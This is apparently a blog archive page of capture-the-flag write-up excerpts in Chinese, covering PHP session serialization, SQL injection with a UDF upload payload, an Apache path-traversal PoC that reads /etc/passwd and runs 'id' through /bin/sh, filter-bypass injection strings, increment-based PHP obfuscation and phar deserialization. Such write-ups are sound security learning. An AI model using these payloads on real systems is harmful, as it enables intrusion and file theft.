07 2022 档案

摘要:PHP session 存储方式 php_serialize 经过 serialize() 函数序列化数组 a:1:{s:4:“name”;s:5:“ocean”;} php(默认) 键名 竖线 经过 serialize() 函数处理的值 name|s:5:“ocean”; php_binary 键 阅读全文
posted @ 2022-07-24 21:34 Aninock 阅读(86) 评论(0) 推荐(0) 编辑
摘要:时间注入拿到admin密码登入,根据sql逻辑构造udf上传,再通过curl提权查看flag payload: -1';create table zzz (c BLOB);INSERT INTO zzz values(unhex('7F454C4602010100000000000000000003 阅读全文
posted @ 2022-07-16 21:09 Aninock 阅读(96) 评论(0) 推荐(0) 编辑
摘要:poc读取 /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd poc读取执行 /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id' 阅读全文
posted @ 2022-07-13 14:08 Aninock 阅读(252) 评论(0) 推荐(0) 编辑
摘要:传入$password进行查询,获取查询结果中的password和传入的$password进行比较,如果password能知道直接登入即可,否则只能尝试注入 尝试1' or 1=1#,注意到有过滤,在尝试构造 '^0# 提示password,因为这里获取的正确password会和传入的: '^0# 阅读全文
posted @ 2022-07-11 20:11 Aninock 阅读(906) 评论(0) 推荐(0) 编辑
摘要:过滤了异或取反构造,这里用自增 $_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__+ 阅读全文
posted @ 2022-07-09 16:18 Aninock 阅读(1588) 评论(0) 推荐(0) 编辑
摘要:phar://是一种伪协议,个人感觉是用来打包的,可以用它获取打包的文件 注意url,类似文件包含,改成index试试 推测是再后面加上.php再进行文件读取 注意不仅能传图片也能传压缩包,我们目的是执行成php,这里用的phar进行打包 <?php $phar = new Phar("phar.p 阅读全文
posted @ 2022-07-03 20:12 Aninock 阅读(904) 评论(2) 推荐(0) 编辑

点击右上角即可分享
微信分享提示
主题色彩
主题色彩
主题色彩
主题色彩
主题色彩
主题色彩
主题色彩